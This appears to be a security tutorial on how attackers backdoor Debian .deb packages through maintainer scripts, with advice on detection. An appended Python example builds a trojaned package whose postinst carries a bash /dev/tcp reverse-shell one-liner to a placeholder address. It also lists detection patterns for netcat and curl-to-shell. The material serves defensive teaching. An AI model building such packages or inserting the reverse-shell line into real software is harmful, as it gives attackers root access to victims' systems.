DEB files are the native package format of Debian-based Linux distributions such as Debian and Ubuntu.
Installing a DEB package means handing it to a package manager like dpkg that runs with root permissions, and the package itself can carry shell scripts that dpkg executes during installation. Attackers take advantage of this by adding a backdoor to those scripts. When you install the package with dpkg (or any front end built on it, such as apt), the malicious code runs as root alongside the legitimate installation and compromises your system.

Let’s explore exactly how DEB packages are backdoored and what you can do to protect yourself.
How Are DEB Packages Backdoored?
Before you understand how DEB packages are backdoored, let’s explore what’s inside a DEB package. For demonstration, I’ll be downloading the Microsoft Visual Studio Code DEB package from the official Microsoft website. This is the same package you’d download if you want to install VS Code on Linux.
Download: Visual Studio Code
Now that you have the target package downloaded, it's time to unpack it. You can unpack a DEB package with the dpkg-deb command and the -R flag, followed by the package file and the directory to extract its contents into:
This should extract the contents of the VS Code package.
Moving into the folder you'll find several directories mirroring the target filesystem (usr, etc, and so on). Our interest lies only in the DEBIAN directory, which holds the package's control metadata and its maintainer scripts: preinst, postinst, prerm and postrm. dpkg runs whichever of these exist, as root, at the corresponding stage of installation or removal. As you might have figured out already, this is where attackers put their code; any of the four scripts would do, and nothing in dpkg checks them against what the vendor originally shipped.
For demonstration, I'll modify the postinst script and add a simple one-liner Bash reverse TCP shell. As the name suggests, postinst runs after the package's files have been unpacked, during the configure step.

It contains the commands that finish setting the package up, such as creating symbolic links, registering alternatives, creating service accounts or enabling services. You can find many different reverse shells on the internet, and most of them work the same way. Here's the sample reverse shell one-liner:
Explanation of the command:
For those uninitiated, a reverse shell is a payload that, when executed on the target machine, opens a connection back to the attacker's machine and attaches a shell to it. Reverse shells are effective at getting past firewalls because the connection is outbound from the victim: most firewalls block unsolicited inbound connections but allow outbound traffic.
Here's what the modified script looks like:
As you can see, everything is the same except for one added line, our Bash reverse shell. Now you need to rebuild the extracted tree into a .deb. Use the dpkg command with the --build flag, or dpkg-deb with the -b flag, followed by the path of the extracted contents (dpkg simply forwards the call to dpkg-deb):
Now the backdoored DEB package is ready to be shipped from a malicious or look-alike download site; nothing about the rebuilt file itself reveals that it was tampered with, since dpkg-deb signs nothing. Let's simulate a scenario where a victim has downloaded the DEB package onto their system and is installing it like any other regular package.

The top terminal pane shows the victim's point of view and the bottom one the attacker's. The victim installs the package with sudo dpkg -i while the attacker waits for incoming connections with a netcat listener.
As soon as installation reaches the configure step, the attacker receives the reverse shell connection, and because dpkg was run with sudo, that shell is root on the victim's system. Now you know how DEB packages are backdoored. Let's look at how you can protect yourself.

How to Detect if a DEB Package Is Malicious
Now that you know that infected DEB packages are a thing, you must be wondering how to find them. For starters, you can try a Linux antivirus such as ClamAV. Unfortunately, when a ClamAV scan was run on the package it didn't flag it as malicious. Here's the result of the scan:
Signature-based scanners only catch payloads they already have signatures for, so a freshly modified package whose only change is one extra line in a maintainer script will usually pass, and a commercial product offers no guarantee either. Let's try a cloud service like the VirusTotal website:

As you can see, VirusTotal didn't detect anything wrong with it either. The reliable defenses are basic security hygiene: don't download packages from unknown sources, avoid shady software in general, and check the file's hash against one the vendor publishes through a channel separate from the download itself (a malicious site will happily publish the hash of its own backdoored file, so a hash taken from the same page proves nothing). Keep in mind that dpkg -i verifies no signature on a standalone .deb; only apt, installing from a repository whose Release file is signed, checks that what you received is what the maintainers published. Since you now know how a package comes apart, you can also inspect one before installing it: run dpkg-deb -e on the downloaded file (or dpkg-deb -R as above) and read the DEBIAN/preinst, postinst, prerm and postrm scripts yourself before handing the package to sudo dpkg -i.
The internet is full of such threats. The only way to browse without losing your data is to keep your wits about you and stick to trusted sites. For Linux, you should also check whether the software you're downloading has an AppImage variant: an AppImage runs as an ordinary user without an installation step, so there are no maintainer scripts executing as root, although it is not sandboxed by default and can still do anything your user account can.
DEB packages aren't inherently bad, but attackers can easily weaponize them and ship them to unsuspecting users. As demonstrated, a DEB package can be opened up and modified to add custom code with only a few commands, making it a convenient vector for shipping malware.
Even a simple backdoor in a DEB package went uncaught by the scanners tried here. So the best thing to do is to play it safe, use common sense as you browse the web, and download software only from official download sites, the distribution's own repositories, or community-trusted sources.
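As an added example (not code from the original article), the script below does in Python what the unpack steps above do by hand and what the detection section asks for: it assembles a structurally valid .deb from scratch, so the container layout (an ar archive holding debian-binary, control.tar.gz with the DEBIAN/ contents, and data.tar.gz) is visible, then parses that container back, pulls out the maintainer scripts and flags lines that look like reverse-shell one-liners. All names (build_deb, scan_deb, INDICATORS) are mine, the two postinst scripts are constructed samples, and the 192.0.2.10:4444 address in the trojaned sample is a documentation-only placeholder that is never contacted.

```python
"""Inspect a .deb without installing it: parse the container, pull out the
maintainer scripts and flag reverse-shell indicators.

Added example, not code from the original article. The layout is the real
one: a .deb is an `ar` archive whose members are `debian-binary` (the text
"2.0\n"), `control.tar.gz` (the DEBIAN/ directory: `control` plus the
maintainer scripts) and `data.tar.gz` (the files that land on disk).
"""
from __future__ import annotations

import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# Strings that commonly appear in shell reverse-shell one-liners. A constructed,
# deliberately small list: these are indicators for triage, not proof of malice.
INDICATORS = [
    (r"/dev/tcp/", "bash /dev/tcp network pseudo-device"),
    (r"\bbash\s+-i\b", "interactive bash"),
    (r"\bnc\b.*\s-e\s", "netcat executing a program"),
    (r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", "download piped into a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
]


def _ar_member(name: str, data: bytes) -> bytes:
    """One member in the common ar format: 60-byte header, data padded to an even length."""
    header = f"{name:<16}{0:<12d}{0:<6d}{0:<6d}{'100644':<8}{len(data):<10d}`\n"
    return header.encode("ascii") + data + (b"\n" if len(data) % 2 else b"")


def _targz(files: dict[str, tuple[bytes, int]]) -> bytes:
    """Gzipped tar of {name: (content, mode)}; paths are written as ./name like dpkg-deb does."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, (content, mode) in files.items():
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode, info.mtime = len(content), mode, 0
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_deb(package: str, scripts: dict[str, str], payload: dict[str, bytes]) -> bytes:
    """Assemble a .deb from a control stanza, maintainer scripts and the files to install."""
    control = (f"Package: {package}\nVersion: 1.0\nArchitecture: all\n"
               "Maintainer: Example <nobody@example.invalid>\nDescription: constructed sample\n")
    control_files = {"control": (control.encode(), 0o644)}
    control_files.update({n: (s.encode(), 0o755) for n, s in scripts.items()})
    data_files = {n: (c, 0o644) for n, c in payload.items()}
    return (AR_MAGIC
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _targz(control_files))
            + _ar_member("data.tar.gz", _targz(data_files)))


def ar_members(blob: bytes) -> dict[str, bytes]:
    """Parse the ar container into {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError(f"corrupt member header at offset {pos}")
        name = header[:16].decode("ascii").rstrip(" /")   # GNU ar may append '/'
        size = int(header[48:58])
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                      # members start on even offsets
    return members


def maintainer_scripts(blob: bytes) -> dict[str, str]:
    """Return {script name: text} for every maintainer script found in control.tar.*."""
    members = ar_members(blob)
    if members.get("debian-binary") != b"2.0\n":
        raise ValueError("missing or unsupported debian-binary member")
    control = next((m for n, m in members.items() if n.startswith("control.tar")), None)
    if control is None:
        raise ValueError("no control tarball")
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:*") as tar:
        for info in tar:
            base = info.name.rsplit("/", 1)[-1]            # "./postinst" -> "postinst"
            if info.isfile() and base in MAINTAINER_SCRIPTS:
                scripts[base] = tar.extractfile(info).read().decode("utf-8", "replace")
    return scripts


def scan_deb(blob: bytes) -> list[tuple[str, int, str, str]]:
    """(script, line number, indicator, offending line) for each hit in any maintainer script."""
    findings = []
    for script, text in maintainer_scripts(blob).items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for pattern, why in INDICATORS:
                if re.search(pattern, line):
                    findings.append((script, lineno, why, line.strip()))
    return findings


# Constructed sample scripts. 192.0.2.10 is a documentation-only (TEST-NET-1)
# address and 4444 an arbitrary placeholder; the scripts are never executed.
BENIGN_POSTINST = """#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    update-alternatives --install /usr/bin/editor editor /usr/bin/example 50
fi
"""
BACKDOORED_POSTINST = BENIGN_POSTINST + "bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1' &\n"

CLEAN_DEB = build_deb("example", {"postinst": BENIGN_POSTINST}, {"usr/bin/example": b"#!/bin/sh\n"})
TROJANED_DEB = build_deb("example", {"postinst": BACKDOORED_POSTINST}, {"usr/bin/example": b"#!/bin/sh\n"})

if __name__ == "__main__":
    for label, deb in (("clean", CLEAN_DEB), ("trojaned", TROJANED_DEB)):
        print(label, scan_deb(deb) or "no indicators")
```

On a real download, scan_deb can be pointed at the file's bytes directly, and the same inspection by hand is dpkg-deb -e package.deb out/ (control files only) followed by reading out/preinst, postinst, prerm and postrm. Treat a hit as a reason to stop and read the script, and a clean result as nothing more than the absence of these particular strings: an attacker who base64-encodes the payload, drops a binary into data.tar.gz and merely calls it from postinst, or uses a language other than shell will not match, which is why comparing the file's hash with one published by the vendor remains the decisive check.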
Secure Your Linux PC by Installing Security Tools
Now that you're aware of the risks of installing DEB packages from new or unknown sites, you should be cautious about what you install. Being careful about software alone isn't enough, though: your Linux system can be the target of network attacks as well.
To limit the damage in the event of a network attack, you should consider installing network security tools.